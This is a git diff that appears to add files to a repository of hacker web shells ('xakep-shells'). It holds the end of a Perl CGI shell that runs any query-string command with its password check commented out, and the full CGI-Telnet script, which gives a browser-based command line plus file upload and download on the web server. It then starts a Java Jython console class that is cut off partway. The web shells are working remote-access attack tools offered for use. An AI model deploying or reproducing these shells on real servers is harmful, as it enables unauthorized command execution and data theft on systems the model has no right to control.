background-color : #F1F1F1;
|
||||
border-style : solid;
|
||||
border-width : 0px;
|
||||
border-color : Silver;
|
||||
}
|
||||
INPUT.BUTTON {
|
||||
font-family : Arial;
|
||||
font-size : 8pt;
|
||||
width : 100px;
|
||||
border-width : 1px;
|
||||
color : Black;
|
||||
background-color : D1D1D1;
|
||||
border-color : silver;
|
||||
border-style : solid;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body bgcolor=#B9B9B9>
|
||||
Vvedite zapros:
|
||||
<table width=500 bgcolor=D9D9D9><tr><td>
|
||||
[ins1]
|
||||
|
||||
print "cd $param{dir}&&$param{cmd}";
|
||||
|
||||
print << "[ins2]";
|
||||
</td></tr></table>
|
||||
Otvet na zapros:
|
||||
<table width=500 bgcolor=D9D9D9><tr><td><pre>
|
||||
[ins2]
|
||||
|
||||
#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
|
||||
open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
|
||||
while ($line=<FILEHANDLE>){print "$line";};
|
||||
close (FILEHANDLE);
|
||||
|
||||
print << "[ins3]";
|
||||
</pre></td></tr></table>
|
||||
<form action=pshell.cgi>
|
||||
DIR dlja sledujushego zaprosa:
|
||||
<input type=text class="TEXT" name=dir value=$param{dir}>
|
||||
Sledujushij zapros:
|
||||
<input type=text class="TEXT" name=cmd value=$param{cmd}>
|
||||
<input type=submit class="button" value="Submit">
|
||||
<input type=reset class="button" value="Reset">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
[ins3]
|
||||
|
||||
sub read_param {
|
||||
$buffer = "$ENV{'QUERY_STRING'}";
|
||||
@pairs = split(/&/, $buffer);
|
||||
foreach $pair (@pairs)
|
||||
{
|
||||
($name, $value) = split(/=/, $pair);
|
||||
$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
|
||||
$value =~ s/\+/ /g;
|
||||
$value =~ s/%20/ /g;
|
||||
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
|
||||
$param{$name} = $value;
|
||||
}
|
||||
}
|
||||
|
||||
#########################<<KONEC>>#####################################
|
697
xakep-shells/CGI/telnet.cgi.txt
Normal file
697
xakep-shells/CGI/telnet.cgi.txt
Normal file
|
@ -0,0 +1,697 @@
|
|||
#!/usr/bin/perl
|
||||
#------------------------------------------------------------------------------
|
||||
# Copyright and Licence
|
||||
#------------------------------------------------------------------------------
|
||||
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
|
||||
#
|
||||
# Copyright (C) 2001 Rohitab Batra
|
||||
# Permission is granted to use, distribute and modify this script so long
|
||||
# as this copyright notice is left intact. If you make changes to the script
|
||||
# please document them and inform me. If you would like any changes to be made
|
||||
# in this script, you can e-mail me.
|
||||
#
|
||||
# Author: Rohitab Batra
|
||||
# Author e-mail: rohitab@rohitab.com
|
||||
# Author Homepage: http://www.rohitab.com/
|
||||
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
|
||||
# Product Support: http://www.rohitab.com/support/
|
||||
# Discussion Forum: http://www.rohitab.com/discuss/
|
||||
# Mailing List: http://www.rohitab.com/mlist/
|
||||
#------------------------------------------------------------------------------
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Installation
|
||||
#------------------------------------------------------------------------------
|
||||
# To install this script
|
||||
#
|
||||
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
|
||||
# your server. For most servers, you may not need to modify this.
|
||||
# 2. Change the password in the Configuration section below.
|
||||
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
|
||||
# Configuration Section below.
|
||||
# 4. Upload the script to a directory on your server which has permissions to
|
||||
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
|
||||
# the script in ASCII mode.
|
||||
# 5. Change the permission (CHMOD) of the script to 755.
|
||||
# 6. Open the script in your web browser. If you uploaded the script in
|
||||
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
|
||||
# 7. Login using the password that you specified in Step 2.
|
||||
#------------------------------------------------------------------------------
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Configuration: You need to change only $Password and $WinNT. The other
|
||||
# values should work fine for most systems.
|
||||
#------------------------------------------------------------------------------
|
||||
$Password = ""; # Change this. You will need to enter this
|
||||
# to login.
|
||||
|
||||
$WinNT = 0; # You need to change the value of this to 1 if
|
||||
# you're running this script on a Windows NT
|
||||
# machine. If you're running it on Unix, you
|
||||
# can leave the value as it is.
|
||||
|
||||
$NTCmdSep = "&"; # This character is used to seperate 2 commands
|
||||
# in a command line on Windows NT.
|
||||
|
||||
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
|
||||
# in a command line on Unix.
|
||||
|
||||
$CommandTimeoutDuration = 100000; # Time in seconds after commands will be killed
|
||||
# Don't set this to a very large value. This is
|
||||
# useful for commands that may hang or that
|
||||
# take very long to execute, like "find /".
|
||||
# This is valid only on Unix servers. It is
|
||||
# ignored on NT Servers.
|
||||
|
||||
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
|
||||
# browser as soon as it is output, otherwise
|
||||
# it is buffered and send when the command
|
||||
# completes. This is useful for commands like
|
||||
# ping, so that you can see the output as it
|
||||
# is being generated.
|
||||
|
||||
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
|
||||
|
||||
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
|
||||
$CmdPwd = ($WinNT ? "cd" : "pwd");
|
||||
$PathSep = ($WinNT ? "\\" : "/");
|
||||
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Reads the input sent by the browser and parses the input variables. It
|
||||
# parses GET, POST and multipart/form-data that is used for uploading files.
|
||||
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
|
||||
# Other variables can be accessed using $in{'var'}, where var is the name of
|
||||
# the variable. Note: Most of the code in this function is taken from other CGI
|
||||
# scripts.
|
||||
#------------------------------------------------------------------------------
|
||||
sub ReadParse
|
||||
{
|
||||
local (*in) = @_ if @_;
|
||||
local ($i, $loc, $key, $val);
|
||||
|
||||
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
|
||||
|
||||
if($ENV{'REQUEST_METHOD'} eq "GET")
|
||||
{
|
||||
$in = $ENV{'QUERY_STRING'};
|
||||
}
|
||||
elsif($ENV{'REQUEST_METHOD'} eq "POST")
|
||||
{
|
||||
binmode(STDIN) if $MultipartFormData & $WinNT;
|
||||
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
|
||||
}
|
||||
|
||||
# handle file upload data
|
||||
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
|
||||
{
|
||||
$Boundary = '--'.$1; # please refer to RFC1867
|
||||
@list = split(/$Boundary/, $in);
|
||||
$HeaderBody = $list[1];
|
||||
$HeaderBody =~ /\r\n\r\n|\n\n/;
|
||||
$Header = $`;
|
||||
$Body = $';
|
||||
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
|
||||
$in{'filedata'} = $Body;
|
||||
$Header =~ /filename=\"(.+)\"/;
|
||||
$in{'f'} = $1;
|
||||
$in{'f'} =~ s/\"//g;
|
||||
$in{'f'} =~ s/\s//g;
|
||||
|
||||
# parse trailer
|
||||
for($i=2; $list[$i]; $i++)
|
||||
{
|
||||
$list[$i] =~ s/^.+name=$//;
|
||||
$list[$i] =~ /\"(\w+)\"/;
|
||||
$key = $1;
|
||||
$val = $';
|
||||
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
|
||||
$val =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$in{$key} = $val;
|
||||
}
|
||||
}
|
||||
else # standard post data (url encoded, not multipart)
|
||||
{
|
||||
@in = split(/&/, $in);
|
||||
foreach $i (0 .. $#in)
|
||||
{
|
||||
$in[$i] =~ s/\+/ /g;
|
||||
($key, $val) = split(/=/, $in[$i], 2);
|
||||
$key =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$val =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$in{$key} .= "\0" if (defined($in{$key}));
|
||||
$in{$key} .= $val;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML Page Header
|
||||
# Argument 1: Form item name to which focus should be set
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintPageHeader
|
||||
{
|
||||
$EncodedCurrentDir = $CurrentDir;
|
||||
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
|
||||
print "Content-type: text/html\n\n";
|
||||
print <<END;
|
||||
<html>
|
||||
<head>
|
||||
<title>CGI-Telnet Version 1.0</title>
|
||||
$HtmlMetaHeader
|
||||
</head>
|
||||
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
|
||||
<table border="1" width="100%" cellspacing="0" cellpadding="2">
|
||||
<tr>
|
||||
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
|
||||
<b><font color="#000080" size="2">#</font></b></td>
|
||||
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to
|
||||
$ServerName</b></font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
|
||||
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
|
||||
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
|
||||
<a href="$ScriptLocation?a=logout">Disconnect</a> |
|
||||
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
|
||||
</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
<font color="#C0C0C0" size="3">
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the Login Screen
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginScreen
|
||||
{
|
||||
$Message = q$<pre><font color="#669999"> _____ _____ _____ _____ _ _
|
||||
/ __ \| __ \|_ _| |_ _| | | | |
|
||||
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
|
||||
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
|
||||
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
|
||||
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 1.0
|
||||
|
||||
</font><font color="#FF0000"> ______ </font><font color="#AE8300">© 2001, Rohitab
|
||||
Batra</font><font color="#FF0000">
|
||||
.-" "-.
|
||||
/ \
|
||||
| |
|
||||
|, .-. .-. ,|
|
||||
| )(_o/ \o_)( |
|
||||
|/ /\ \|
|
||||
(@_ (_ ^^ _)
|
||||
_ ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font
|
||||
color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font
|
||||
color="#FF0000">/</font><font color="#808080">_______________________
|
||||
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font
|
||||
color="#808080"><________</font><font color="#FF0000">|-\IIIIII/-|</font><font
|
||||
color="#808080">________________________></font><font color="#FF0000">
|
||||
)_/ \ /
|
||||
(@ `--------`
|
||||
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
|
||||
$;
|
||||
#'
|
||||
print <<END;
|
||||
<code>
|
||||
Trying $ServerName...<br>
|
||||
Connected to $ServerName<br>
|
||||
Escape character is ^]
|
||||
<code>$Message
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the message that informs the user of a failed login
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginFailedMessage
|
||||
{
|
||||
print <<END;
|
||||
<code>
|
||||
<br>login: admin<br>
|
||||
password:<br>
|
||||
Login incorrect<br><br>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form for logging in
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginForm
|
||||
{
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="a" value="login">
|
||||
login: admin<br>
|
||||
password:<input type="password" name="p">
|
||||
<input type="submit" value="Enter">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the footer for the HTML Page
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintPageFooter
|
||||
{
|
||||
print "</font></body></html>";
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Retreives the values of all cookies. The cookies can be accesses using the
|
||||
# variable $Cookies{''}
|
||||
#------------------------------------------------------------------------------
|
||||
sub GetCookies
|
||||
{
|
||||
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
|
||||
foreach $cookie(@httpcookies)
|
||||
{
|
||||
($id, $val) = split(/=/, $cookie);
|
||||
$Cookies{$id} = $val;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the screen when the user logs out
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLogoutScreen
|
||||
{
|
||||
print "<code>Connection closed by foreign host.<br><br></code>";
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Logs out the user and allows the user to login again
|
||||
#------------------------------------------------------------------------------
|
||||
sub PerformLogout
|
||||
{
|
||||
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
|
||||
&PrintPageHeader("p");
|
||||
&PrintLogoutScreen;
|
||||
&PrintLoginScreen;
|
||||
&PrintLoginForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called to login the user. If the password matches, it
|
||||
# displays a page that allows the user to run commands. If the password doens't
|
||||
# match or if no password is entered, it displays a form that allows the user
|
||||
# to login
|
||||
#------------------------------------------------------------------------------
|
||||
sub PerformLogin
|
||||
{
|
||||
if($LoginPassword eq $Password) # password matched
|
||||
{
|
||||
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
|
||||
&PrintPageHeader("c");
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
else # password didn't match
|
||||
{
|
||||
&PrintPageHeader("p");
|
||||
&PrintLoginScreen;
|
||||
if($LoginPassword ne "") # some password was entered
|
||||
{
|
||||
&PrintLoginFailedMessage;
|
||||
}
|
||||
&PrintLoginForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to enter commands
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintCommandLineInputForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="a" value="command">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
$Prompt
|
||||
<input type="text" name="c">
|
||||
<input type="submit" value="Enter">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to download files
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintFileDownloadForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
<input type="hidden" name="a" value="download">
|
||||
$Prompt download<br><br>
|
||||
Filename: <input type="text" name="f" size="35"><br><br>
|
||||
Download: <input type="submit" value="Begin">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to upload files
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintFileUploadForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
|
||||
$Prompt upload<br><br>
|
||||
Filename: <input type="file" name="f" size="35"><br><br>
|
||||
Options: <input type="checkbox" name="o" value="overwrite">
|
||||
Overwrite if it Exists<br><br>
|
||||
Upload: <input type="submit" value="Begin">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
<input type="hidden" name="a" value="upload">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the timeout for a command expires. We need to
|
||||
# terminate the script immediately. This function is valid only on Unix. It is
|
||||
# never called when the script is running on NT.
|
||||
#------------------------------------------------------------------------------
|
||||
sub CommandTimeout
|
||||
{
|
||||
if(!$WinNT)
|
||||
{
|
||||
alarm(0);
|
||||
print <<END;
|
||||
</xmp>
|
||||
<code>
|
||||
Command exceeded maximum time of $CommandTimeoutDuration second(s).
|
||||
<br>Killed it!
|
||||
<code>
|
||||
END
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
exit;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called to execute commands. It displays the output of the
|
||||
# command and allows the user to enter another command. The change directory
|
||||
# command is handled differently. In this case, the new directory is stored in
|
||||
# an internal variable and is used each time a command has to be executed. The
|
||||
# output of the change directory command is not displayed to the users
|
||||
# therefore error messages cannot be displayed.
|
||||
#------------------------------------------------------------------------------
|
||||
sub ExecuteCommand
|
||||
{
|
||||
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
|
||||
{
|
||||
# we change the directory internally. The output of the
|
||||
# command is not displayed.
|
||||
|
||||
$OldDir = $CurrentDir;
|
||||
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
|
||||
chop($CurrentDir = `$Command`);
|
||||
&PrintPageHeader("c");
|
||||
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
|
||||
print "<code>$Prompt $RunCommand</code>";
|
||||
}
|
||||
else # some other command, display the output
|
||||
{
|
||||
&PrintPageHeader("c");
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print "<code>$Prompt $RunCommand</code><xmp>";
|
||||
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
|
||||
if(!$WinNT)
|
||||
{
|
||||
$SIG{'ALRM'} = \&CommandTimeout;
|
||||
alarm($CommandTimeoutDuration);
|
||||
}
|
||||
if($ShowDynamicOutput) # show output as it is generated
|
||||
{
|
||||
$|=1;
|
||||
$Command .= " |";
|
||||
open(CommandOutput, $Command);
|
||||
while(<CommandOutput>)
|
||||
{
|
||||
$_ =~ s/(\n|\r\n)$//;
|
||||
print "$_\n";
|
||||
}
|
||||
$|=0;
|
||||
}
|
||||
else # show output after command completes
|
||||
{
|
||||
print `$Command`;
|
||||
}
|
||||
if(!$WinNT)
|
||||
{
|
||||
alarm(0);
|
||||
}
|
||||
print "</xmp>";
|
||||
}
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function displays the page that contains a link which allows the user
|
||||
# to download the specified file. The page also contains a auto-refresh
|
||||
# feature that starts the download automatically.
|
||||
# Argument 1: Fully qualified filename of the file to be downloaded
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintDownloadLinkPage
|
||||
{
|
||||
local($FileUrl) = @_;
|
||||
if(-e $FileUrl) # if the file exists
|
||||
{
|
||||
# encode the file link so we can send it to the browser
|
||||
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
|
||||
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
|
||||
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
|
||||
&PrintPageHeader("c");
|
||||
print <<END;
|
||||
<code>
|
||||
Sending File $TransferFile...<br>
|
||||
If the download does not start automatically,
|
||||
<a href="$DownloadLink">Click Here</a>.
|
||||
</code>
|
||||
END
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
else # file doesn't exist
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
print "<code>Failed to download $FileUrl: $!</code>";
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function reads the specified file from the disk and sends it to the
|
||||
# browser, so that it can be downloaded by the user.
|
||||
# Argument 1: Fully qualified pathname of the file to be sent.
|
||||
#------------------------------------------------------------------------------
|
||||
sub SendFileToBrowser
|
||||
{
|
||||
local($SendFile) = @_;
|
||||
if(open(SENDFILE, $SendFile)) # file opened for reading
|
||||
{
|
||||
if($WinNT)
|
||||
{
|
||||
binmode(SENDFILE);
|
||||
binmode(STDOUT);
|
||||
}
|
||||
$FileSize = (stat($SendFile))[7];
|
||||
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
|
||||
print "Content-Type: application/x-unknown\n";
|
||||
print "Content-Length: $FileSize\n";
|
||||
print "Content-Disposition: attachment; filename=$1\n\n";
|
||||
print while(<SENDFILE>);
|
||||
close(SENDFILE);
|
||||
}
|
||||
else # failed to open file
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
print "<code>Failed to download $SendFile: $!</code>";
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user downloads a file. It displays a message
|
||||
# to the user and provides a link through which the file can be downloaded.
|
||||
# This function is also called when the user clicks on that link. In this case,
|
||||
# the file is read and sent to the browser.
|
||||
#------------------------------------------------------------------------------
|
||||
sub BeginDownload
|
||||
{
|
||||
# get fully qualified path of the file to be downloaded
|
||||
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
|
||||
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
|
||||
{
|
||||
$TargetFile = $TransferFile;
|
||||
}
|
||||
else # path is relative
|
||||
{
|
||||
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TargetFile .= $PathSep.$TransferFile;
|
||||
}
|
||||
|
||||
if($Options eq "go") # we have to send the file
|
||||
{
|
||||
&SendFileToBrowser($TargetFile);
|
||||
}
|
||||
else # we have to send only the link page
|
||||
{
|
||||
&PrintDownloadLinkPage($TargetFile);
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user wants to upload a file. If the
|
||||
# file is not specified, it displays a form allowing the user to specify a
|
||||
# file, otherwise it starts the upload process.
|
||||
#------------------------------------------------------------------------------
|
||||
sub UploadFile
|
||||
{
|
||||
# if no file is specified, print the upload form again
|
||||
if($TransferFile eq "")
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
&PrintFileUploadForm;
|
||||
&PrintPageFooter;
|
||||
return;
|
||||
}
|
||||
&PrintPageHeader("c");
|
||||
|
||||
# start the uploading process
|
||||
print "<code>Uploading $TransferFile to $CurrentDir...<br>";
|
||||
|
||||
# get the fullly qualified pathname of the file to be created
|
||||
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TransferFile =~ m!([^/^\\]*)$!;
|
||||
$TargetName .= $PathSep.$1;
|
||||
|
||||
$TargetFileSize = length($in{'filedata'});
|
||||
# if the file exists and we are not supposed to overwrite it
|
||||
if(-e $TargetName && $Options ne "overwrite")
|
||||
{
|
||||
print "Failed: Destination file already exists.<br>";
|
||||
}
|
||||
else # file is not present
|
||||
{
|
||||
if(open(UPLOADFILE, ">$TargetName"))
|
||||
{
|
||||
binmode(UPLOADFILE) if $WinNT;
|
||||
print UPLOADFILE $in{'filedata'};
|
||||
close(UPLOADFILE);
|
||||
print "Transfered $TargetFileSize Bytes.<br>";
|
||||
print "File Path: $TargetName<br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Failed: $!<br>";
|
||||
}
|
||||
}
|
||||
print "</code>";
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user wants to download a file. If the
|
||||
# filename is not specified, it displays a form allowing the user to specify a
|
||||
# file, otherwise it displays a message to the user and provides a link
|
||||
# through which the file can be downloaded.
|
||||
#------------------------------------------------------------------------------
|
||||
sub DownloadFile
|
||||
{
|
||||
# if no file is specified, print the download form again
|
||||
if($TransferFile eq "")
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
return;
|
||||
}
|
||||
|
||||
# get fully qualified path of the file to be downloaded
|
||||
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
|
||||
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
|
||||
{
|
||||
$TargetFile = $TransferFile;
|
||||
}
|
||||
else # path is relative
|
||||
{
|
||||
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TargetFile .= $PathSep.$TransferFile;
|
||||
}
|
||||
|
||||
if($Options eq "go") # we have to send the file
|
||||
{
|
||||
&SendFileToBrowser($TargetFile);
|
||||
}
|
||||
else # we have to send only the link page
|
||||
{
|
||||
&PrintDownloadLinkPage($TargetFile);
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Main Program - Execution Starts Here
|
||||
#------------------------------------------------------------------------------
|
||||
&ReadParse;
|
||||
&GetCookies;
|
||||
|
||||
$ScriptLocation = $ENV{'SCRIPT_NAME'};
|
||||
$ServerName = $ENV{'SERVER_NAME'};
|
||||
$LoginPassword = $in{'p'};
|
||||
$RunCommand = $in{'c'};
|
||||
$TransferFile = $in{'f'};
|
||||
$Options = $in{'o'};
|
||||
|
||||
$Action = $in{'a'};
|
||||
$Action = "login" if($Action eq ""); # no action specified, use default
|
||||
|
||||
# get the directory in which the commands will be executed
|
||||
$CurrentDir = $in{'d'};
|
||||
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
|
||||
|
||||
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
|
||||
|
||||
if($Action eq "login" || !$LoggedIn) # user needs/has to login
|
||||
{
|
||||
&PerformLogin;
|
||||
}
|
||||
elsif($Action eq "command") # user wants to run a command
|
||||
{
|
||||
&ExecuteCommand;
|
||||
}
|
||||
elsif($Action eq "upload") # user wants to upload a file
|
||||
{
|
||||
&UploadFile;
|
||||
}
|
||||
elsif($Action eq "download") # user wants to download a file
|
||||
{
|
||||
&DownloadFile;
|
||||
}
|
||||
elsif($Action eq "logout") # user wants to logout
|
||||
{
|
||||
&PerformLogout;
|
||||
}
|
125
xakep-shells/JSP/Java Shell.js.txt
Normal file
125
xakep-shells/JSP/Java Shell.js.txt
Normal file
|
@ -0,0 +1,125 @@
|
|||
package enigma.shells.jython;
|
||||
|
||||
import java.io.*;
|
||||
import java.awt.*;
|
||||
import javax.swing.*;
|
||||
|
||||
import enigma.console.*;
|
||||
import enigma.console.java2d.*;
|
||||
|
||||
import org.python.core.*;
|
||||
import org.python.util.*;
|
||||
|
||||
public class JythonShell extends JPanel implements Runnable {
|
||||
public static int DEFAULT_ROWS = 20;
|
||||
public static int DEFAULT_COLUMNS = 80;
|
||||
public static int DEFAULT_SCROLLBACK = 100;
|
||||
|
||||
public PrintStream out;
|
||||
|
||||
public Console console;
|
||||
public Java2DTextWindow text;
|
||||
public JScrollPane scrollPane;
|
||||
public PythonInterpreter interp;
|
||||
|
||||
private Color colorBackground = new Color(0, 0, 0);
|
||||
private Color colorForeground = new Color(187, 187, 187);
|
||||
private Color colorError = new Color(187, 0, 0);
|
||||
private Color colorCursor = new Color(187, 187, 0);
|
||||
|
||||
public JythonShell() {
|
||||
this(null, Py.getSystemState());
|
||||
}
|
||||
|
||||
public JythonShell(PyObject dict) {
|
||||
this(dict, Py.getSystemState());
|
||||
}
|
||||
|
||||
public JythonShell(int columns, int rows, int scrollback) {
|
||||
this(null, Py.getSystemState(), columns, rows, scrollback);
|
||||
}
|
||||
|
||||
public JythonShell(PyObject dict, PySystemState systemState) {
|
||||
this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
|
||||
}
|
||||
|
||||
public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
|
||||
super(new BorderLayout());
|
||||
|
||||
text = new Java2DTextWindow(columns, rows, scrollback);
|
||||
text.setBackground(colorBackground);
|
||||
|
||||
scrollPane = new JScrollPane();
|
||||
scrollPane.setViewportView(text);
|
||||
|
||||
add(scrollPane, BorderLayout.CENTER);
|
||||
|
||||
console = new DefaultConsoleImpl(text);
|
||||
out = console.getOutputStream();
|
||||
|
||||
interp = new PythonInterpreter(dict, systemState);
|
||||
interp.setOut(out);
|
||||
interp.setErr(out);
|
||||
}
|
||||
|
||||
public void run() {
|
||||
int pos = 0;
|
||||
